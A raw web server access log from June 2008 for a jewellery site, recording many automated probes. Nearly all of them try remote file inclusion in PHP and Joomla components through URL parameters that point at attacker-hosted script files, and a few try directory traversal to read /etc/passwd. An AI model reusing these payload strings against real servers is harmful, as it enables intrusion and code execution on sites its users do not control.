81.115.150.149 - - [30/Jun/2008:17:01:30 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:01:30 -0700] "GET //skin/zero_vote/error.php?dir=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:01:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
208.111.154.15 - - [30/Jun/2008:17:02:18 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sojewels.com"
208.111.154.16 - - [30/Jun/2008:17:02:18 -0700] "GET /logs?S=A HTTP/1.0" 301 80 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sojewels.com"
208.111.154.16 - - [30/Jun/2008:17:02:19 -0700] "GET /logs/?S=A HTTP/1.0" 200 2495 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sojewels.com"
189.1.168.93 - - [30/Jun/2008:17:03:00 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
189.1.168.93 - - [30/Jun/2008:17:03:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
189.1.168.93 - - [30/Jun/2008:17:03:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
82.131.219.62 - - [30/Jun/2008:17:03:58 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
62.77.192.67 - - [30/Jun/2008:17:03:59 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
62.77.192.67 - - [30/Jun/2008:17:03:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:05:56 -0700] "GET /logs/access_080501.log/send_reminders.php?includedir=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:05:56 -0700] "GET /send_reminders.php?includedir=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:05:57 -0700] "GET /logs/send_reminders.php?includedir=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:07:13 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:07:14 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:07:14 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.19.255.240 - - [30/Jun/2008:17:07:32 -0700] "GET /logs/access_080131.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mchando.com/board/rgboard/data/.marlon/motd/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:09:44 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:09:44 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
189.62.145.42 - - [30/Jun/2008:17:09:45 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://eskentx.kit.net/kkid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
77.235.41.172 - - [30/Jun/2008:17:13:50 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://vannithendral.net/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
77.235.41.172 - - [30/Jun/2008:17:13:50 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://vannithendral.net/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
77.235.41.172 - - [30/Jun/2008:17:13:50 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://vannithendral.net/images/var.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:14:55 -0700] "GET //atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.12.53.176 - - [30/Jun/2008:17:16:47 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sojewels.com"
195.12.53.176 - - [30/Jun/2008:17:16:47 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sojewels.com"
210.205.6.178 - - [30/Jun/2008:17:17:30 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
210.205.6.178 - - [30/Jun/2008:17:17:30 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
87.233.151.54 - - [30/Jun/2008:17:17:38 -0700] "GET /print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.230.35.101 - - [30/Jun/2008:17:18:01 -0700] "GET /print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:18:42 -0700] "GET /logs/access_080531.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:18:42 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:18:42 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.72.152 - - [30/Jun/2008:17:21:52 -0700] "GET //main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:23:51 -0700] "GET /logs/access_080501.log//atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:23:56 -0700] "GET //atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:24:01 -0700] "GET /logs//atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:24:06 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:24:06 -0700] "GET /logs/access_080501.log/send_reminders.php?includedir=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:24:07 -0700] "GET //skin/zero_vote/error.php?dir=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:24:07 -0700] "GET /send_reminders.php?includedir=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:24:07 -0700] "GET /logs/send_reminders.php?includedir=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:24:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
64.185.237.47 - - [30/Jun/2008:17:25:46 -0700] "GET /logs/access_080531.log//atom.php5?page=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:25:48 -0700] "GET /logs/access_080331.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:25:48 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:25:49 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:17:26:36 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:17:26:36 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:17:26:36 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
81.115.150.149 - - [30/Jun/2008:17:28:36 -0700] "GET /logs/access_080301.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arabkang.net46.net/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:17:28:52 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:17:28:52 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:17:28:52 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:29:02 -0700] "GET /logs/access_080531.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:29:03 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:29:04 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:29:04 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:29:05 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:17:29:05 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
210.205.6.178 - - [30/Jun/2008:17:29:10 -0700] "GET /facileforms.frame.php?ff_compath=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
210.205.6.178 - - [30/Jun/2008:17:29:11 -0700] "GET /logs/facileforms.frame.php?ff_compath=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
87.233.151.54 - - [30/Jun/2008:17:30:11 -0700] "GET /logs/access_080531.log/print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
87.233.151.54 - - [30/Jun/2008:17:30:11 -0700] "GET /logs/print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
212.227.251.172 - - [30/Jun/2008:17:30:28 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
212.227.251.172 - - [30/Jun/2008:17:30:31 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.72.152 - - [30/Jun/2008:17:32:38 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
69.89.31.88 - - [30/Jun/2008:17:33:23 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.31.88 - - [30/Jun/2008:17:34:02 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.31.88 - - [30/Jun/2008:17:34:02 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.31.88 - - [30/Jun/2008:17:34:03 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
87.230.35.101 - - [30/Jun/2008:17:34:26 -0700] "GET /logs/access_080531.log/print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
87.230.35.101 - - [30/Jun/2008:17:34:26 -0700] "GET /logs/print.php?page=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
80.67.20.109 - - [30/Jun/2008:17:34:34 -0700] "GET //index.php?sourcedir=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
202.181.105.117 - - [30/Jun/2008:17:35:02 -0700] "GET /logs/access_080531.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
87.101.4.42 - - [30/Jun/2008:17:35:17 -0700] "GET /logs/access_080131.log//index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
87.101.4.42 - - [30/Jun/2008:17:35:17 -0700] "GET //index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
87.101.4.42 - - [30/Jun/2008:17:35:18 -0700] "GET /logs//index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.205.6.178 - - [30/Jun/2008:17:35:33 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
210.205.6.178 - - [30/Jun/2008:17:35:33 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.sojewels.com"
89.159.202.119 - - [30/Jun/2008:17:36:05 -0700] "GET /logs/access.log HTTP/1.0" 200 18804 "-" "Lynx/2.8.6rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8e" "www.sojewels.com"
216.193.201.57 - - [30/Jun/2008:17:36:21 -0700] "GET /logs/access_080531.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.sojewels.com"
216.193.201.57 - - [30/Jun/2008:17:36:21 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:36:27 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:36:27 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:36:27 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
88.84.143.195 - - [30/Jun/2008:17:37:02 -0700] "GET /logs/access_080131.log//index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
88.84.143.195 - - [30/Jun/2008:17:37:03 -0700] "GET //index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
88.84.143.195 - - [30/Jun/2008:17:37:03 -0700] "GET /logs//index.php?sourcedir=http://web246.webgo24-server11.de/Homepage/fightus/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:38:03 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:38:03 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:38:04 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:39:10 -0700] "GET /logs/access_080331.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:39:11 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:39:11 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:39:30 -0700] "GET /logs/access_080331.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:39:31 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:39:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:39:31 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:39:37 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:39:37 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:17:39:37 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:39:50 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:40:15 -0700] "GET /logs/access_080331.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:40:15 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:40:16 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:40:27 -0700] "GET /logs/access_080331.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:40:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:40:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:40:30 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
89.108.91.166 - - [30/Jun/2008:17:40:43 -0700] "GET /logs/access_080531.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kirkcod.110mb.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
69.89.31.88 - - [30/Jun/2008:17:44:01 -0700] "GET /logs/access_080131.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://claro3g.freehostia.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
74.63.2.169 - - [30/Jun/2008:17:44:58 -0700] "GET /logs//main.php?appserv_root=http://yeguadamendeika.com/images/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
